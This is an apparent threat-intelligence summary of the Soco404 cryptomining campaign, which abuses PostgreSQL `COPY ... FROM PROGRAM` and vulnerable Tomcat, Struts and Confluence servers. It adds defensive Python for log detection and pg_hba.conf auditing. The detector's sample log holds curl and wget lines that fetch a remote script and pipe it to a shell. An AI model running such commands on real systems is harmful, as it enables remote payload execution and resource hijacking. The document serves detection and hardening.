Full Report
Wiz Research has identified a new iteration of a broader malicious cryptomining campaign, which we’ve dubbed Soco404.
Analysis Summary
# Tool/Technique: Soco404 (Cryptomining Campaign Infrastructure)
## Overview
Soco404 is the designation given by Wiz Research to a new iteration of a broad, opportunistic, and versatile cryptomining campaign. This campaign targets cloud environments, exploiting misconfigurations (notably in PostgreSQL) and vulnerable public-facing applications (like Apache Tomcat, Struts, and Confluence) to deploy platform-specific malware for resource hijacking (cryptomining). The infrastructure supporting this campaign is diverse, utilizing compromised legitimate servers, fake 404 error pages, and dedicated crypto-scam websites.
## Technical Details
- Type: Malware Campaign / Infrastructure
- Platform: Linux and Windows
- Capabilities: Exploitation of PostgreSQL, cross-platform payload delivery, persistence mechanisms tailored for both OSs, crypto-mining, hosting payloads on compromised infrastructure and custom deceptive domains.
- First Seen: Not explicitly stated, but noted as a "new iteration" building upon previously documented activity (Aqua/Imperva findings).
## MITRE ATT&CK Mapping
- **Initial Access**
  - **T1190 - Exploit Public-Facing Application**
- **Execution**
  - **T1059.004 - Command and Scripting Interpreter: Unix Shell**
  - **T1559 - Inter-Process Communication**
- **Persistence**
  - **T1053.003 - Create or Modify System Process: Cron**
  - **T1543.003 - Create or Modify System Process: Windows Service**
  - **T1546.004 - Event Triggered Execution: Unix Shell Configuration Modification** (via `.bashrc`, `.profile`)
- **Defense Evasion**
  - **T1036.005 - Masquerading: Match Legitimate Name or Location**
  - **T1070.002 - Indicator Removal: Clear Linux or Mac System Logs**
  - **T1070.004 - Indicator Removal: File Deletion**
  - **T1562.002 - Impair Defenses: Disable Windows Event Logging**
  - **T1027.006 - Obfuscated Files or Information: HTML Smuggling**
  - **T1055 - Process Injection**
- **Credential Access**
  - **T1110.003 - Brute Force: Password Spraying** (used in the broader campaign against Tomcat/Struts/Confluence)
- **Command and Control**
  - **T1105 - Ingress Tool Transfer**
- **Impact**
  - **T1496 - Resource Hijacking** (cryptomining)
- **Resource Development**
  - **T1583.006 - Acquire Infrastructure: Web Services** (Google Sites used for payload hosting initially)
  - **T1584.004 - Compromise Infrastructure: Server** (abusing legitimate servers)
## Functionality
### Core Capabilities
- **Initial Compromise:** Exploiting misconfigured PostgreSQL instances using `COPY ... FROM PROGRAM` for Remote Code Execution (RCE). Also targeting exposed Apache Tomcat, Apache Struts, and Atlassian Confluence servers.
- **Payload Delivery:** Leverages diverse methods including abusing legitimate servers (compromised Tomcat instances), custom domains displaying fake 404 pages (potentially using HTML Smuggling), and disposable infrastructure like Google Sites.
- **Execution:** For Linux, the `soco.sh` dropper script runs directly in memory, downloads the main payload, executes it, and then deletes the dropper script.
- **Platform Versatility:** Deploys platform-specific malware for both Linux and Windows targets.
### Advanced Features
- **Process Masquerading:** Disguises malicious activity to appear as legitimate system processes (`T1036.005`).
- **In-Memory Execution:** The Linux dropper script runs directly in memory to avoid immediate disk-based detection.
- **Inter-Process Communication:** The malware spawns multiple child processes that communicate using local sockets.
- **Infrastructure Abuse:** Uses compromised legitimate infrastructure (e.g., a Korean transportation website) to host and deliver payloads, increasing trust and evading security controls.
- **Evasion:** Explicitly avoids dropping files into known volatile directories like `/tmp` or `/sys` on Linux targets.
## Indicators of Compromise
*Note: Specific IoCs (hashes, IPs, domains) were not extracted comprehensively, but general descriptions are provided.*
- File Hashes: N/A (specific hashes were not isolated in the TL;DR structure provided)
- File Names: the payload is referenced as `app2` when downloaded from the distribution server; the payload name is inferred to be related to **Soco404**.
- Registry Keys: N/A (Windows persistence details are sparse)
- Network Indicators:
  - Distribution point example: `http://<IP>:8080/app2`
  - Connections via compromised infrastructure hosts.
  - Evidence of communication related to a crypto wallet address (mining pool communication).
- Behavioral Indicators:
  - Abuse of PostgreSQL's `COPY ... FROM PROGRAM`.
  - Use of standard ingress tools such as `wget` and `curl` (Linux) or `certutil` and `PowerShell` (Windows).
  - Creation of cron jobs (`T1053.003`) and modification of shell initialization files (`.bashrc`, `.profile`) for persistence (`T1546.004`).
## Associated Threat Actors
- The threat actor behind **Soco404** (Part of a broader, versatile, opportunistic crypto-scam infrastructure). Associated with previous activity documented targeting Apache Tomcat, Struts, and Confluence.
## Detection Methods
- **Signature-based detection:** Detection on specific payload hashes (if available).
- **Behavioral detection:** Monitoring for PostgreSQL activity utilizing `COPY ... FROM PROGRAM`. Monitoring for the creation of persistence mechanisms like new cron entries or shell initialization modifications. Detecting process masquerading attempts by monitoring child processes spawned by legitimate system parents.
- **YARA rules if available:** N/A (Not provided in context)
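The behavioral detection above, as an added example that is not part of the Wiz report: a small parser for PostgreSQL statement logs (`log_statement = 'all'` format) that flags every `COPY ... FROM PROGRAM` (and, going beyond the text, `COPY ... TO PROGRAM`) statement, extracts the shell command so the alert can say what ran, and marks commands that invoke the ingress tools the report names. The log lines, IPs and paths are constructed for the example.

```python
import re

# Constructed sample PostgreSQL log lines (log_statement = 'all' style);
# the IPs, users and commands are made up for this example, not campaign IoCs.
SAMPLE_PG_LOG = """\
2025-07-01 10:01:02 UTC [1234] app@shop LOG:  statement: SELECT id FROM orders WHERE id = 42
2025-07-01 10:01:05 UTC [1240] postgres@postgres LOG:  statement: COPY t FROM PROGRAM 'curl -s http://198.51.100.7:8080/app2 | sh'
2025-07-01 10:01:06 UTC [1240] postgres@postgres LOG:  statement: copy  t   from   program  'wget -q -O- http://203.0.113.9/soco.sh|bash'
2025-07-01 10:01:09 UTC [1251] etl@warehouse LOG:  statement: COPY staging FROM '/srv/data/batch.csv' CSV
2025-07-01 10:01:12 UTC [1240] postgres@postgres LOG:  statement: COPY (SELECT 1) TO PROGRAM 'id > /dev/null'
"""

LOG_LINE = re.compile(
    r"^(?P<ts>\S+ \S+ \S+) \[(?P<pid>\d+)\] (?P<user>[^@]+)@(?P<db>\S+) "
    r"LOG:\s+statement: (?P<stmt>.*)$"
)
# COPY ... FROM|TO PROGRAM, tolerant of odd spacing and case; captures the
# quoted shell command ('' is SQL's escaped quote) so the alert can report it.
COPY_PROGRAM = re.compile(
    r"\bcopy\b.*?\b(?P<dir>from|to)\s+program\s+'(?P<cmd>(?:[^']|'')*)'",
    re.IGNORECASE,
)
INGRESS_TOOLS = ("curl", "wget", "certutil", "powershell")

def find_copy_program(log_text: str) -> list[dict]:
    """Return one alert dict per COPY ... FROM/TO PROGRAM statement."""
    alerts = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue                      # not a statement line
        hit = COPY_PROGRAM.search(m["stmt"])
        if not hit:
            continue                      # ordinary COPY or other SQL
        cmd = hit["cmd"].replace("''", "'")
        alerts.append({
            "pid": int(m["pid"]),
            "user": m["user"],
            "db": m["db"],
            "direction": hit["dir"].upper(),
            "command": cmd,
            "ingress_tool": any(t in cmd.lower() for t in INGRESS_TOOLS),
        })
    return alerts

if __name__ == "__main__":
    for alert in find_copy_program(SAMPLE_PG_LOG):
        print(alert)
```

A plain file-based `COPY ... FROM '/path'` (line 4 of the sample) is deliberately not flagged, so the rule stays quiet for normal bulk loads.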
## Mitigation Strategies
- **Prevention measures:** Patching vulnerabilities in public-facing applications (Tomcat, Struts, Confluence). Secure configuration of PostgreSQL instances, ensuring no unauthenticated access.
- **Hardening recommendations:** Restrict public internet access to database services like PostgreSQL. Implement strong authentication on all public-facing services. Monitor and restrict the use of unusual command execution functions like `COPY ... FROM PROGRAM` if possible. Disable unnecessary services.
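The hardening points above (no public exposure, no unauthenticated access, strong authentication), as an added example that is not from the report: an audit of `pg_hba.conf` rules that flags address ranges outside private/loopback space, the `trust`/`password` methods, legacy `md5`, and non-TLS `host` rules on exposed ranges. Both configuration excerpts are constructed for the example. Separately, since `COPY ... FROM PROGRAM` is only available to superusers and members of the `pg_execute_server_program` role, the "restrict its use" recommendation amounts to never granting either to application roles.

```python
import ipaddress

# Constructed pg_hba.conf excerpts: a weak configuration and its corrected
# form. These are illustrative, not taken from the report.
WEAK_HBA = """\
# TYPE  DATABASE  USER  ADDRESS        METHOD
local   all       all                  peer
host    all       all   127.0.0.1/32   scram-sha-256
host    all       all   0.0.0.0/0      trust
host    all       all   ::/0           md5
"""
HARDENED_HBA = """\
local   all       all                  peer
host    all       all   127.0.0.1/32   scram-sha-256
hostssl all       app   10.20.0.0/16   scram-sha-256
"""

# Ranges treated as internal; anything not fully inside one is "exposed".
INTERNAL = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8",
    "::1/128", "fc00::/7")]
WEAK_METHODS = {"trust", "password"}   # no auth / cleartext password

def is_internal(net) -> bool:
    return any(net.version == r.version and net.subnet_of(r) for r in INTERNAL)

def audit_pg_hba(text: str) -> list[str]:
    """Return one finding string per weak or over-broad TCP rule."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        fields = raw.split("#", 1)[0].split()     # drop comments/blank lines
        if len(fields) < 5 or fields[0] == "local":
            continue                              # socket rules not audited
        kind, db, user, addr, method = fields[:5]
        try:
            net = ipaddress.ip_network(addr, strict=False)
        except ValueError:
            continue                              # hostnames, samenet, etc.
        exposed = not is_internal(net)
        if method in WEAK_METHODS:
            findings.append(f"line {n}: method '{method}' for {addr} allows unauthenticated access")
        if exposed:
            findings.append(f"line {n}: {kind} {db} {user} exposes the server to {addr}")
        if exposed and kind == "host":
            findings.append(f"line {n}: 'host' permits non-TLS clients from {addr}; use hostssl")
        if method == "md5":
            findings.append(f"line {n}: legacy method 'md5'; prefer scram-sha-256")
    return findings
```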
## Related Tools/Techniques
- Similar cryptomining botnets/campaigns previously documented targeting Tomcat, Struts, and Confluence (implied connection to Sysrv botnet activity mentioned in context).
- Use of standard Linux utilities (`wget`, `curl`) and Windows utilities (`certutil`, `PowerShell`) for initial execution and transfer.